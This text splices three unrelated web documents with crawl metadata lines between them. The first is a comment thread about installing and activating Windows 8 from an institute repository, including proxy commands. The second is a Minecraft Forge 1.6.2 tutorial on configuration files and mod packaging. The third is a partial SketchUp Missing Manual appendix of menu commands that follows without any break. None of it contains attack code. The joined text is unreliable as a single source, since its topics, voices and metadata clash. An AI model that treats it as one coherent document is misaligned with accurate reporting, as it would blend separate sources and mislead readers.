hi i am not able to access the software repo by the process u have said the error message is
WINDOWS CANT ACCESS \\144.16.192.212
Check your network settings. Its working fine on my end.
What exactly could be the problem, in the network settings..
I myself am also not able to access it. Getting the same error.
can i update
Are you able to download apps from Microsoft Store in the Metro UI mode? I guess there are some issues when we try to do it over proxy..
I have found a way to downoad apps using our proxy. Will be posting an article regarding the same by tomorrow.
Thank You !!!
Slui.exe 0×3 is not opening ??
typ 0×3 instead of0×3……replace the cross sign with ‘x’ from keyboard.
Is it only for student who in campus ?
Yes
after creating bootable files on pendrive , where to click??
Boot your computer with your pendrive.
Thanks……….i have upgraded it.
for those who cannot open store..
Open command prompt as admin and write:
netsh
winhttp
import proxy source=ie
now click enter..
this worked for me
We can run the apps by using:
netsh winhttp import proxy ie
Can you please clarify one thing:
Do I need to run the same commands as mentioned above (after first disabling proxy in internet explorer) to disable app-proxy when I go home and use my home’s proxy-free wifi ?
To remove the system proxy use this
netsh winhttp reset
Thanks :)
are they providing license for microsoft visual studio registered version?
Yeah.
I have installed the windows 8 and it working properly.. thanks… my doubt is will it work outside campus without any problem…????
It will work fine. :)
Hi
i am now using window8.
But it didn’t asked for ACT KEY during booting.
Will it ask for KEY in future?
Thanks a lot
Check point 4. Activating Windows in the article.
in cic file list they have matlab 2012. is that registered version is for KGP students also?
cannot activate..displaying multiple activation key has exceeded its limit
Well, it is what it is then.
if that is the situation…will we get another key from institute..or not..i have installed windows 8 but did not activate it..what should i do know???
As far as I know, the Key to 64 bit versions have reached the limit. You can try 32 bit or ask CIC people for any solution.
I changed my OS to windows 8 after downloading from CIC and getting the serial key from there…. but now when i use that to activate the windows… it says that it cant be activated and that “The activation server has reported that the multiple activation key has exceeded its limit” …. somebody please help… :(
As far as I know, the Key to 64 bit versions have reached the limit. You can try 32 bit or ask CIC people for any solution.
Yeah Getting the same probloem….multiple activation key has exceeded its limit…What can be done in this case?
its replying that it multiple activation key has exceeded its limit
I have Windows vista basic genuine in my laptop. Can I install M S office 2010? Will it be compatible?
Yes , you can install MS office 2010 .
Hey has anyone done this recently??? Is it still showing “multiple activation key has exceeded its limit” or are we getting other key or some other way out by CIC???
i installed fifa13 and nfs on my windows8 pc but these games are not working. when i try to open a game it shows ” no apps are installed to open this type of link(origin)”. any solution for this problem?
I am getting an error when I am trying to activate it.. it is saying “windows couldnt be activated, the file name, directory name or label syntax is incorrect”. now what is that? plz tell me
try windows activation via phone.. that works :)
Great and interesting articles it is nice info in this post.
I am getting an error when I am trying to activate it.. it is saying “windows couldnt be activated, the file name, directory name or label syntax is incorrect”. now what is that? plz tell me
|
http://www.comptalks.com/get-licensed-windows-8-from-iitkgp-cic/
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
[1.6.2] Minecraft Forge Modding #8 - Configuration File and Mod Distribution
Hey, guys, and welcome to Tutorial #8 of my Minecraft Forge modding series. In the last tutorial, I showed you how to make an omni-tool with the functionality of the four existing in-game tools.
In this tutorial, I am going to show you how to set up a Configuration file which will handle all our IDs, which will allow users of our mod to alter the IDs should we/they run into any ID conflicts with other mods. I will also be explaining to you how to package your mod into a distributable file, which can be run inside of the Minecraft client.
The first thing we are going to want to do is head into our Ids class file. There are currently three integers in this class; tutItem, tutTool and tutBlock. We are going to need to delete all three of these and start again. Each item is now going to have two integers related to it; a default value and an actual value. To do this, we need to make, obviously, two integers per ID:
package tutorial.lib; public class Ids { public static int tutItem_actual; public static final int tutItem_default = 16000; public static int tutTool_actual; public static final int tutTool_default = 16001; public static int tutBlock_actual; public static final int tutBlock_default = 3000; }
We will now get errors inside of our Items and Blocks class files. This is fine; we simply need to change their values ("tutBlock" needs to be renamed "tutBlock_actual" in the Blocks class and "tutItem" and "tutTool" need to be renamed "tutItem_actual" and "tutTool_actual" in the Items class).
Our Blocks class should now look like this:
package tutorial.blocks; import cpw.mods.fml.common.registry.GameRegistry; import cpw.mods.fml.common.registry.LanguageRegistry; import net.minecraft.block.Block; import tutorial.lib.Ids; import tutorial.lib.Names; public class Blocks { public static Block block; public static void init() { block = new TutBlock(Ids.tutBlock_actual); GameRegistry.registerBlock(block, Names.tutBlock_name); } public static void addNames() { LanguageRegistry.addName(block, Names.tutBlock_name); } }
And our Items class should look like this:
package tutorial.items; import net.minecraft.item.EnumToolMaterial; import net.minecraft.item.Item; import net.minecraftforge.common.MinecraftForge; import tutorial.lib.Ids; import tutorial.lib.Names; import cpw.mods.fml.common.registry.LanguageRegistry; public class Items { public static Item item; public static Item tool; public static void init() { item = new TutItem(Ids.tutItem_actual); tool = new TutTool(Ids.tutTool_actual, EnumToolMaterial.EMERALD); } public static void addNames() { LanguageRegistry.addName(item, Names.tutItem_name); LanguageRegistry.addName(tool, Names.tutTool_name); } }
However, if we try to run the client now, we will get a crash because all three IDs are trying to use the same value. Why is this? Well, because we have not linked the actual value with the default value.
To do this, we are going to need to create a new class, which I am going to put inside my lib package, called "ConfigHandler". We are going to use our config handler to create a new ".cfg" file, which the mod user can use to alter the IDs of the blocks/items in your mod.
To do this, our init constructor inside of the ConfigHandler class is going to have to have a condition; a file:
package tutorial.lib; import java.io.File; public class ConfigHandler { public static void init(File configFile) { } }
We are then going to have to call upon an existing class called "Configuration" which we are going to use to save and load any edited IDs (or initial IDs upon first use):
package tutorial.lib; import java.io.File; import net.minecraftforge.common.Configuration; public class ConfigHandler { public static void init(File configFile) { Configuration config = new Configuration(configFile); } }
We can now use our "config" parameter to save and load the IDs:
config.load(); config.save();
This means that our ConfigHandler class should currently look like this:
package tutorial.lib; import java.io.File; import net.minecraftforge.common.Configuration; public class ConfigHandler { public static void init(File configFile) { Configuration config = new Configuration(configFile); config.load(); config.save(); } }
Obviously, our ConfigHandler class is not registering any IDs yet, but it also will not be loaded as we have not added it to our main mod class (Tutorial). To do this, go to the Tutorial class file and, inside of the preInit constructor, we need to load the ConfigHandler:
@EventHandler public static void preInit ( FMLPreInitializationEvent event ) { ConfigHandler.init(event.getSuggestedConfigurationFile()); }
We are now calling our ConfigHandler class inside of our preInit constructor. When it creates our config file, it will create it as the "suggested configuration file", which means it can be found inside the "config" folder of your .minecraft (or inside the "jars" folder inside the "mcp" folder in the case of running it in Eclipse) and will be called "<ModInfo.ID>.cfg".
Now we can register our IDs with our ConfigHandler. All of the IDs that we want to register need to be put between the "config.load()" and "config.save()" methods. We can also load Strings and booleans inside of our ConfigHandler, but we are only interested in IDs since this is all we have created.
First, we are going to register our tutBlock's ID:
Ids.tutBlock_actual = config.getBlock(Names.tutBlock_name, Ids.tutBlock_default).getInt();
What the code is doing is getting an integer that connects the tutBlock_actual with another value (in this case, tutBlock_default). When you open the config file (after you have run the mod), you will see a line that will say:
I:"Tutorial Block"=3000
This means that the user can now alter the ID and avoid any ID conflicts with other mods. We are going to do a similar thing with the IDs for tutItem and tutTool:
Ids.tutItem_actual = config.getItem(Names.tutItem_name, Ids.tutItem_default).getInt() - 256; Ids.tutTool_actual = config.getItem(Names.tutTool_name, Ids.tutTool_default).getInt() - 256;
The only difference between registering block IDs and item IDs is that item IDs are shifted by +256 (so, if you tell it an ID of 10000, it will actually use an ID of 10256). I'm not entirely sure why it does this, but it is a vanilla feature so cannot be stopped. To get around the problem, we simply reduce the integer that the ConfigHandler finds by 256 so that the ID we tell it is the ID that it uses.
Our finished ConfigHandler should now look like this:
package tutorial.lib; import java.io.File; import net.minecraftforge.common.Configuration; public class ConfigHandler { public static void init(File configFile) { Configuration config = new Configuration(configFile); config.load(); Ids.tutBlock_actual = config.getBlock(Names.tutBlock_name, Ids.tutBlock_default).getInt(); Ids.tutItem_actual = config.getItem(Names.tutItem_name, Ids.tutItem_default).getInt() - 256; Ids.tutTool_actual = config.getItem(Names.tutTool_name, Ids.tutTool_default).getInt() - 256; config.save(); } }
If you now run the client, the game will run normally and you can find the configuration file in "mcp/jars/config".
The final thing that I am going to show you how to do in this tutorial is package your mod for release to the general public. For this, we are going to need to leave the Eclipse workspace (you do not need to close Eclipse) and head on over to the "mcp" folder.
Inside of the "mcp" folder, there are a variety of Windows Batch Files and SH Files. Windows users should, obviously, use the Batch Files, whereas Mac users should use the SH Files.
The first file we are going to want to run is called "recompile". This will, as the name suggests, recompile the source code (which are .java file) into .class
files.
This will take a few moments to run and recompile the code. Ignore the warning that says "!! Can not find server sources, try decompiling !!" and close the window.
Once the code has been recompiled, we will then need to run the file called "reobfuscate". The "reobfuscate" file will search through the newly recompiled Minecraft source code and identify any .class files that are new (i.e. not in the vanilla Minecraft source code). It will then extract these .class files and put them inside the folder called "reobf".
Once the "reobfuscate" file has completed, open the "reobf" folder inside the "mcp" folder. There will be another folder called "minecraft"; you should open this too. Inside of the "minecraft" folder, there will be a folder with the first part of our mod's package name (for example, "tutorial"). If you open the "tutorial" folder, you will find all of our packages and .class files.
Copy this "tutorial" folder to a separate location. We are going to need to add this folder to a .zip or .jar file. We then need to go back to our "mcp" folder and head into the "src" folder. Go into the "minecraft" folder and then copy the folder called "assets". The "assets" folder also needs to be added to the .zip/.jar file.
Your mod is now ready for public release. The user simply needs to drop the .zip/.jar file into their "mods" folder and they can use your mod.
End of Tutorial
This is the end of Minecraft Forge Modding #8 - Configuration File and Mod Distribution. In this tutorial, we have made a configuration file that allows mod users to change the IDs of our blocks and items if they encounter an ID conflict (or feel like changing the ID for fun). We have also packaged our mod into a .zip/.jar file ready for distribution to the Minecraft audience.
The next few tutorials are going to be utility-related (for example, adding an mcmod.info file and using a LogHelper to print messages to the console). This is because I am starting to begin writing some advanced tutorials using TileEntities, Containers and GUIs to create a custom chest and a custom furnace. Feel free to head on over to the "Advanced Tutorials" page of my website (link can be found here) to follow along with them; however, be warned, they are going to be long multi-part tutorials that will take a while for me to write and upload, so please be patient with them.
I hope this tutorial has been useful and, as always, I'll see you in the next one.
~MrrGingerNinja
View the previous tutorial (Tutorial #7 - Creating an Omni-Tool) here
View the next tutorial (Tutorial #9a - Utility Part 1: mcmod.info) here
|
http://www.minecraftforum.net/topic/1907545-162-minecraft-forge-modding-8-configuration-file-and-mod-distribution/
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
I've been (re)searching for a prng on the web. I came up with the following (excuse my syntax -- I'm a newbie in shading):
A few depending on bitwise operations:
1.
It supposedly returns normalized values.It supposedly returns normalized values.Code :#extension GL_EXT_gpu_shader4: enable float rnd(vec2 v) { int n = int(v.x * 40.0 + v.y * 6400.0); n = (n << 13) ^ n; return 1.0 - float( (n * (n * n * 15731 + 789221) + 1376312589) & 0x7fffffff) / 1073741824.0; }
2.
Code :#extension GL_EXT_gpu_shader4: enable int LFSR_Rand_Gen(int n) { n = (n << 13) ^ n; return (n * (n*n*15731+789221) + 1376312589) & 0x7fffffff; }
This belongs to George Marsaglia (hope I've written the code right):
3.
Code :#extension GL_EXT_gpu_shader4: enable int rando(ivec2 p) { p.x = 36969*(p.x & 65535) + (p.x >> 16); p.y = 18000*(p.y & 65535) + (p.y >> 16); return (p.x << 16) + p.y; }
There also is the xorshift () but uses static vars.
I can't enable the appropriate extension in my software. I didn't want it anyway as I like to keep things simple. And I don't want such a large period / perfect distribution, either.
Here's one of unknown origin which looks suspicious due to the sin() for which reason I'll refrain from using it, namely "one-liner":
4.
Code :float rand(vec2 co) { return fract(sin(dot(co.xy, vec2(12.9898,78.233))) * 43758.5453); }
and finally, the most fitted prng for myself that I found was (*rolling drums*):
Lehmer random number generator, which accepts different setup values from which I chose:
5.
Code :int lcg_rand(int a) { return (a * 75) % 65537; }
The trouble with this last prng (and not only) is that the returned value must be saved as the seed for the next call.
So, how can it be saved? Is there a static qualifier or some workaround, so the function could be called from within the fragment shader and each subsequent call to set the "static" seed for the next?
OR
Does anybody know of a fast short prng which pops the random number based on, say, one of the texCoord floats?
Or any other ideas?
The whole idea goes towards generating fast 1D / 2D noise with under 10 lines code.
|
http://www.opengl.org/discussion_boards/showthread.php/182830-simple-fast-PRNG-s?p=1255215
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
Your Account
Google SketchUp: The Missing Manual gives you all the
details, explanations, and examples you need to create awesome 3-D models in
SketchUp. This appendix provides quick thumbnail descriptions of every command in
every menu..
Many of the menu commands have multiple keyboard shortcuts. Each command in
this list shows the available shortcuts for Windows and Mac systems. When more
than one command is available, they're separated by a semicolon (;).
The File menu commands work on your SketchUp
documents as a whole. Use the File menu for major events like starting a new
project, opening a file you created previously, and shutting down SketchUp when
you're finished working.
Windows: Ctrl+N
Mac: ⌘-N
The New command opens a new SketchUp document, the proverbial clean slate.
On Windows computers if you have a document already open, SketchUp prompts
you to save the current document before opening a new one. If you need to
open more than one SketchUp document in Windows, start SketchUp a second
time and then open the second file. Macs let you open more than one document
at a time by simply creating new windows.
Windows: Ctrl+O
Mac: ⌘-O
Opens the standard window where you can navigate through your folders and
open SketchUp files. Use Open to quickly find and
open SketchUp documents. See New for ways to open more than one SketchUp
document at a time. The techniques are different for Windows and Mac.
Displays a submenu that lists SketchUp files that were recently opened.
Click any file to reopen it. (For Windows, see Recent Files.)
Windows: Ctrl+S
Mac: ⌘-S
Saves the changes that you've made to your SketchUp document. In Windows,
if you haven't made any changes in the document, the command is dimmed. If
you haven't yet saved the document, the command is similar to Save As,
Mac: Shift-⌘-S
Saves the current document with a new name, or in a previous SketchUp file
format such as SketchUp 5 or SketchUp 6. After choosing the command, you see
a standard window where you can navigate to a different folder and type in a
new name. When SketchUp is done saving, the document is still open, but has
the new name.
Saves the current document with a new name similarly to Save As. When the
save finishes, the current document is still open in SketchUp and has the
original file name.
Discards any changes you made to the document since the last save. Revert
is handy when you decide you've gone down the wrong path and just want
things the way they were when you started.
Exports the current SketchUp document to the LayOut program (the section called “Workflow for a LayOut Project”). LayOut is only available in
SketchUp Pro and provides features for producing detailed documents from
SketchUp models.
Gives access to the 3D Warehouse, Google's web-based site where the
SketchUp community can share models. Why reinvent the wheel when you can
download it from the 3D Warehouse? At the warehouse, you find complete
buildings and building components like doors and windows from major
manufacturers. Furniture, appliances, and non-architectural models like
cars, airplanes, and animals are also available. You may be surprised at
what you'll find at the 3D Warehouse. Into Elvis Presley? You can download
the Graceland mansion and models of Elvis himself.
Exports your SketchUp model to different 2-D and 3-D file formats. The 2-D formats—like
JPG, TIFF, and PDF—create images based on the current view in the
modeling window. The free SketchUp program only exports to one 3-D format:
the .kmz file format used by Google Earth. SketchUp Pro exports to several
other formats, including standard AutoCAD formats such as .dxf and .dwg. You
can also use this command to export animations and section slices.
Imports 2-D and 3-D files into SketchUp for modeling, for Photo Match, or
to use as raw material for creating a new SketchUp model.
Opens the standard Windows Print Setup window, where you choose your
printer, paper size, and page orientation.
Leads to the Print Preview window, where you can adjust print settings
including scale. Click OK to see a preview. From the Print Preview, you can
print the image or return to SketchUp.
Mac: Shift-⌘-P
Leads to a standard Mac panel where you set printer options including page
size, page orientation, and the printing scale in percentage.
Leads to a panel where you can adjust the print size and print scale for
the document. Perspective view cannot create scalable documents, so you must
set the view to Parallel Projection (Camera → Parallel
Projection).
Windows: Ctrl+P
Mac: ⌘-P
Displays the standard Print window, where you choose a printer and the
number of copies you wish to print.
Creates an attribute report for Dynamic components.
Windows computers display a list of recently opened SketchUp documents on
the File menu. To open a document, click the
name.
Windows: Alt+F4
Mac: ⌘-Q (found on the SketchUp menu)
Stops the program and then closes the SketchUp window. If documents are
open, SketchUp closes them. If documents are unsaved, the program prompts
you to save them before quitting.
Mac programs have a standard menu under the program name. These menus access
basic services and preferences.
Displays a box that lists the version number for SketchUp and web links to
help and license details.
Displays license details for SketchUp Pro. This option is grayed out on
the free version of SketchUp.
Checks the Google SketchUp website to determine if you're running the most
recent version of SketchUp. A window displays the search results.
Leads to standard Mac services like Finder, Disk Utility, and Font Book.
You can customize the options on this list through the Mac operating
system.
⌘-H
Hides the SketchUp menu and window so you can view
other objects on your computer desktop.
Option, ⌘-H
Hides all programs except SketchUp.
Displays the windows of all currently running programs.
⌘-Q
This menu holds the standard Cut, Copy, and Paste commands as well as several
specific commands that work with SketchUp components and groups.
Windows: Ctrl+Z
Mac: ⌘-Z
This command undoes the last command you applied. So if you accidentally
delete an edge or face in the modeling window, the Undo command brings it
back like magic. Remember Undo for those moments when you smack your head
and say "Oh no! Why'd I do that?" SketchUp keeps track of your actions
sequentially, so you can use multiple Undo commands to backtrack through
your recent actions. Most actions can be undone, but a few—like the
deletion of a scene—can't be undone.
Windows: Ctrl+Y
Mac: Shift-⌘-Z
Redo lets you undo an Undo command. If you undo an action or a command and
then decide that you preferred it before the Undo, use the Redo command to
get back to square one. You can use multiple Undos and Redos to move back
and forth through your recent SketchUp activities.
Windows: Ctrl+X
Mac: ⌘-X
Removes the selected entity (or entities) from the modeling window, and
places a copy of it on your computer's Clipboard. Once it's on the
Clipboard, you can paste it back into the modeling window.
The term entity refers to any selectable object
in SketchUp. An entity can be a single edge, a face, or a complex group
or component.
Windows: Ctrl+C
Mac: ⌘-C
Copies a selected entity (or entities) and places the copy on the
Clipboard. The original entity stays in place. Using this command, you can
copy and paste entities from one SketchUp document into another.
Windows: Ctrl+V
Mac: ⌘-V
Attaches a copy of an entity (or entities) stored on the Clipboard to the
Move tool. Click a location to paste the entity in the modeling window. If
you decide not to complete the paste action, press Esc or choose another
tool.
Pastes a copy of entities on the Clipboard back into position using the
same XYZ coordinates as the original. This command is particularly useful
for moving entities into or out of groups and components.
Windows:
Mac:
Removes selected entities from the modeling window. Unlike Cut,
doesn't put the entity on the Clipboard, and you can't paste it back into
the window.
You can use Undo immediately after Delete to bring back something you
deleted.
Guides are dashed lines used for measurement and alignment. When you're
ready to create an animation or to print images from your model, you can use
this command to remove the guide lines.
Windows: Ctrl+A
Mac: ⌘-A
Selects all entities in the modeling window.
Windows: Ctrl+T
Mac: Shift-⌘-A
Removes the selection from all currently selected objects. SketchUp
builders often simply click an empty space in the modeling window to
deselect everything. Use Select None to make absolutely sure nothing is
selected.
Mac: ⌘-E
Hides any selected entities from view in the modeling window. This command
doesn't erase or delete the entities; you can make them visible with the
Unhide command (next).
Makes hidden entities visible again. (See the previous command.) So how do
you see and select a hidden object? If it's a group or a component, you can
use the Outliner to select the hidden object. Otherwise you can use the View
→ Hidden Geometry command to make entities visible and selectable.
They're still considered hidden until you use the Unhide command. The Unhide
command has three submenu options:
Unhides entities that are selected using one of the techniques
described in the previous paragraph.
Unhides the last entity that was hidden. The entity doesn't have to be
selected.
Mac: Shift-⌘-E
Unhides all the hidden entities in the modeling window. The entities
don't have to be selected.
Locks groups and components. You can't move locked groups and components
until you unlock them (next).
Unlocks groups and components that have been locked using Lock
Windows: G
Mac: Shift-⌘-G
Collects the selected entities and saves them in a SketchUp component.
Components appear in the Components window, and you replicate them by
creating new instances. All instances created from a single component are
identical. (See the section called “Creating a Group” for more detail on groups
and components.)
Mac: ⌘-G
Saves the collected entities in a group. Groups don't appear in the
Components window. (See the section called “Creating a Group” for more on
groups and components.)
Mac: Ctrl-Shift-⌘-G
Closes an open group or component. (Groups and components must be
opened—by double-clicking, for example—to be edited.)
In SketchUp, entities (like a rectangle and a cone) can pass through each
other without cutting through any of the other faces. Unlike in the real
world, they can occupy the same face. When you want to change that behavior,
you create shared edges by using the Intersect commands. The way faces and
entities intersect with each other is important in SketchUp: It determines
the way the entities behave and the way they can be manipulated. The
Intersect command automates the process of creating shared edges. To use the
Intersect commands, select an entity and then choose one of the three
submenu options:
Creates intersections where other entities overlap the current
selection.
Creates intersections among the entities included in the
selection.
Creates intersections between two entities within the current context
(in the same group or component) and excludes entities outside of the
context.
This menu and its submenu options show
commands related to the currently selected entities. You can see many of
these same options in a shortcut menu by right-clicking selected entities.
If a single face or edge is selected, the name on the menu changes to "edge"
or "face". If several edges and faces are selected (but aren't in a group or
component), you see something like "5 Entities". When a group or component
is selected, you see "group" or "component" as the menu name. The options
displayed in the submenu change depending on the selection.
Selects other entities with another submenu showing these options:
Connected Faces, All Connected, or "All on Same Layer".
Smoothes the angles formed where faces meet at an edge.
Divides a single edge into multiple edges. After selecting the
command, type a number and press Enter (Return on a Mac).
Changes the view so the selected edge fills the modeling window and is
entirely within the window.
Selects other entities with another submenu showing these options:
Bounding Edges, Connected Faces, All Connected, "All on Same Layer", and
"All with Same Material".
Using submenus, this command calculates the surface area covered by a
face, covered by a specific material, or in the current layer. The
result appears in the Measurements toolbar.
Creates intersections between the face and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Aligns the SketchUp camera to point toward the currently selected
face.
Repositions the axes relative to the selected face.
Reverses the inside/outside orientation of the faces. Using the
standard face colors, white faces (front faces) become blue, and blue
faces (back faces) become white.
Changes the orientation of several faces to match the selection.
SketchUp does a little guessing here to try and decide how you want the
faces oriented. Often it works just right. When it doesn't, you can
always use Undo and orient the faces one by one using Reverse
Faces.
Changes the view so the selected face fills the modeling window and is
entirely within the window.
Opens a group for editing.
Changes the entities in the selected group to individual entities no
longer grouped.
Turns a group into a component, with all the features of a
component.
Frees a group from being glued to another face in your model.
Changes a group that you've scaled back to its original
proportions.
Changes a group that you've skewed back to its original
proportions.
Creates intersections between the group and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Flips a group along a selected axis (red, blue, or green). Flipping
doesn't create a mirror image of the group.
Changes the view so the selected group fills the modeling window and
is entirely within the window.
Opens a component for editing. Any changes made affect all other
instances of the component.
Makes a single instance of a component into a new, separate component.
The original component otherwise remains unchanged.
Makes the entities in a component into separate entities, no longer
contained in the component. The original component is still in the
Components window.
Frees a component from being glued to another face in your
model.
Updates the currently selected component with a version saved in your
computer's file system.
Saves a component as a new SketchUp document under a different name.
(You can also load any SketchUp document into any other SketchUp
document as a component; see the section called “Saving Components for Reuse”.)
Redefines the origin of the axes in the selected component. Other 3-D
programs sometimes refer to this as the local coordinate
system. You can use this command to align the component's
bounding box with the component's geometry, which helps prevent entities
from skewing awkwardly when scaled.
Changes back a component that you've scaled to its original
proportions.
Changes back a component that you've skewed to its original
proportions.
If the selected component has been scaled, choosing this option makes
that scale the correct scale for all instances of the component. Other
instances won't change in size, but they will have the option to Reset
Scale. SketchUp uses the newly defined scale definition for the
reset.
Creates intersections between the component and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Flips a component along a selected axis (red, blue, or green).
Flipping isn't the same as creating a mirror image of the group.
Smoothes the edges adjoining two surfaces, making those two surfaces
look like a single curved surface. Opens the Soften Edges window, where
you can adjust the angle setting.
Changes the view so the selected component fills the
modeling window and is entirely within the window.
Opens the Component Options box for Dynamic Components.
Mac: Option-⌘-T
Opens a window with special characters like arrow and math symbols, which
you can use with SketchUp's 3D text tool.
Commands on the View menu mostly let you show and hide
different features in the modeling window. (The options that manage the angle
and orientation of your view of the modeling window are under the Camera
Shows and hides tool palettes. Windows and Mac handle tool palettes
differently. In Windows, this menu manages all tool options. Windows
toolbars can be docked or floating. To move toolbars, drag the handle on the
left side. Use the Large Buttons option to change the size of the button on
all the toolbars. PC toolbars include Getting Started, Large Tool Set,
Camera, Construction, Drawing, Face Style, Google, Layers, Measurements,
Modification, Principal, Sections, Shadows, View, Walkthrough, and Dynamic
Components.
On this menu, a Mac has three toolbars that you can show or hide: Large
Tool Set, Google, and Dynamic Components.
Mac tools are customized primarily using the Customize Toolbar command
(the section called “For Mac”).
Shows and hides scene tabs that appear at the top of the modeling
window.
Shows and hides entities that you've hidden using the Edit → Hide
command. This command also shows additional geometry in some entities like
smoothed surfaces.
Shows and hides the section plane used to create section cuts.
Shows and hides section cuts in the modeling window.
Shows and hides the red, green, and blue axes.
Shows and hides the guides you place in your model as references.
Shows and hides shadow effects.
Shows and hides fog effects.
The Edge Style view options show and hide different visual
effects applied to edges.
Shows and hides edges in the model.
Shows and hides the visual effect that increases the thickness of some
edges to enhance the three-dimensional appearance of models.
Shows and hides a visual effect that changes line thickness depending
on the distance from the camera.
A sketchy (the section called “Changing Edge Styles”) visual effect that
extends lines slightly beyond their endpoints, making the model look
hand drawn.
Changes the appearance of faces in your model. These options are also
available on the Face Style toolbar, which is usually a more convenient way
to access them.
Changes the transparency of faces so you can see through your model.
This option toggles on and off and can work in combination with any of
the other face styles.
Hides faces, leaving only edges visible.
Displays faces in the model without any shading or textures.
Faces display material but not textures.
Faces display both material and textures.
Displays faces without material effects using the default
material—usually white for front faces and blue for back
faces.
Displays and hides model entities relative to the selected
component.
Displays the selected component, but hides the other entities in the
modeling window.
Hides other instances of the selected component. This command comes in
handy when you're working on an array of components and need a less
cluttered view.
Controls features related to scenes and animations.
Mac: Option-⌘-+
Adds a new scene to the SketchUp document.
Mac: Option-⌘-
Updates the scene to match the current view.
Deletes the selected scene.
Windows: Page Up
Moves to the previous scene.
Windows: Page Down
Moves to the next scene.
Plays the animation.
Opens the animation settings in the Model Info window.
Hides the Mac toolbar at the top of the modeling window.
Used to display and hide specific tools in the Mac toolbar above the
modeling window. In Windows, the Tool Palettes command (the section called “For Windows”) performs similar functions.
In SketchUp, you view through a camera the three-dimensional world
where your model lives. Most of the commands on this menu set the position and
properties of that camera.
Changes the camera position and view to the immediately previous setup.
You can use Previous multiple times to step back through different views of
your model. Keep in mind, this isn't an Undo command, so your model doesn't
change as you step back, just your angle of view.
Used after using the Previous tool. Permits you to move forward again
through your camera views.
Lets you repostion the camera through which you view your model.
Mac: ⌘-1
Changes the camera to view the modeling window from the top.
Mac: ⌘-2
Changes the camera to view the modeling window from the bottom.
Mac: ⌘-3
Changes the camera to view the modeling window from the
front.
Mac: ⌘-4
Changes the camera to view the modeling
window from the back.
Mac: ⌘-5
Changes the camera to view the modeling window from the left.
Mac: ⌘-6
Changes the camera to view the modeling window from the right.
Mac: ⌘-7
Changes the camera to view the modeling window from an angle.
Changes the camera to view the modeling window without the converging
lines of the perspective views. This view can help with some alignment
chores. In other cases it can be confusing. In general the perspective views
provide a better sense of three dimensions and distance.
Creates a view where an object in the distance appears smaller than
objects close to the camera. SketchUp uses three-point perspective unless
you tell it otherwise (next).
Creates a view using two-point perspective, which has two vanishing points
instead of SketchUp's standard three-point perspective. This type of view is
similar to view cameras or lenses that correct parallax problems. While in
two-point perspective view you can use the Pan tool to change the view;
however, if you use the Orbit tool, the view changes back to
Perspective.
Opens a file browser window so you can bring a photo into SketchUp for
photo-matching; the Edit Matched Photo tools become available. Photo
matching makes it easier to create an accurate model from a photograph. For
details, see Chapter 10, Matching Your Photos in SketchUp.
Puts SketchUp in Photo Matching mode, giving you the tools to adjust the
modeling window so you can accurately create a model from a
photograph.
Windows: O
Mac: O; ⌘-B
Mouse shortcut: Drag while pressing the middle mouse button.
A camera movement tool that lets you move
around the 3-D modeling space in any direction. This tool is very useful for
readjusting your angle of view.
Windows: H
Mac: H; ⌘-R
Mouse shortcut: Press Shift as you drag with the middle mouse
button.
Displays a hand cursor that lets you drag the view of the modeling window
to change your view. Unlike a cinematic pan, where the camera pivots on a
tripod, this command actually changes the camera position.
Windows: Z
Mac: Z; ⌘-\
Mouse shortcut: Press Ctrl as you drag with the middle mouse
button.
Like the zoom lens on a camera, it gives you a closer or more distant view
in the modeling window.
The Zoom metaphor doesn't entirely hold up. The Zoom tools actually
move the camera position; they don't change the field of view, which is
what a camera's zoom lens does (for that, see the next command). Martin
Scorsese would have named this command "dolly."
The field of view is an angle measurement in degrees that describes how
much or how little of the modeling window the camera sees. You can use
degrees (deg), where larger numbers equal a greater view, or millimeters
(mm) for camera lens size, where larger numbers produce a narrower view.
Choose this command and SketchUp displays the field of view in the
Measurements toolbar. You can then type a new measurement—like
30 deg or 50mm—to
change the field of view.
Windows: Ctrl+Shift+W
Mac: ⌘-]
After choosing this command, drag a rectangular window on screen. SketchUp
changes the modeling window view to fit the area you mark.
Windows: Ctrl+Shift+E
Mac: ⌘-[
When chosen from the camera menu, Zoom Extents changes
the view to comfortably fit all the entities in the modeling window, which
is great for returning to a familiar view when you get lost in your model
(the section called “Introducing the Blue Axis”). When chosen from a
shortcut (right-click) menu, Zoom Extents fills the modeling window with the
selected entities, helping you to quickly focus on a specific entity.
If you've applied a photo to a scene's background as part of a Match Photo
session, this zooms the view until the photo fits entirely within the
view.
After choosing this command, click a surface or the SketchUp ground plane
to position the camera in a specific location.
Mac: ⌘-, (comma)
Lets you manually move the camera through your model (the section called “Looking Around”).
Mac: ⌘-. (period)
Use this command to pivot the camera horizontally and vertically around a
single point; it does the same thing as panning and tilting in motion
picture lingo.
Commands in the Draw menu fire up SketchUp's basic drawing
tools. Most of these tools use SketchUp's click-move-click drawing method. They
also let you use the Measurements toolbar to draw with great accuracy (the section called “A Tour of SketchUp's Main Window”).
Windows: L
Mac: L; ⌘-L
Activates the Line tool. To draw lines, click the starting
point, and then move the cursor and click the ending point.
Windows: A
Mac: A; ⌘-J
Activates the Arc tool. To draw arcs, click to create one starting point,
then move the cursor, and click to set the ending point for the line. Then
click a third time to create the curve of the arc.
Mac: ⌘-F
Activates the Freehand tool used for drawing irregular lines. The Freehand
tool is one of a few tools you drag. To use the Freehand tool, press the
mouse button as you trace a line in the modeling window.
Windows: R
Mac: R; ⌘-K
Activates the Rectangle tool. To draw a rectangle, click to set one corner
of the rectangle, and then click again to set the opposite corner.
Windows: C
Mac: C
Activates the Circle tool. To draw a circle, click to set the center of
the circle, and then click to set a point at the edge of the circle.
Mac: ⌘-;
Activates the Polygon tool. To create a Polygon, click to set a point for
the center, and then click to set a point on the edge of the polygon. To set
the number of sides, type the number of sides followed immediately by the
letter s. For example, 3s for a
triangle; 8s for an octagon. After selecting the
Polygon tool, you can type the number of sides before or immediately after
creating the polygon.
Sandbox tools let you model terrain and other organic shapes in SketchUp.
The design element used to create these shapes is referred to as a TIN or
triangulated irregular network.
To activate the sandbox tools, go to Window → Preferences
→ Extensions (SketchUp → Preferences →
Extensions) and turn on the Sandbox Tools checkbox.
Use From Contours to create a TIN from the contours formed by SketchUp
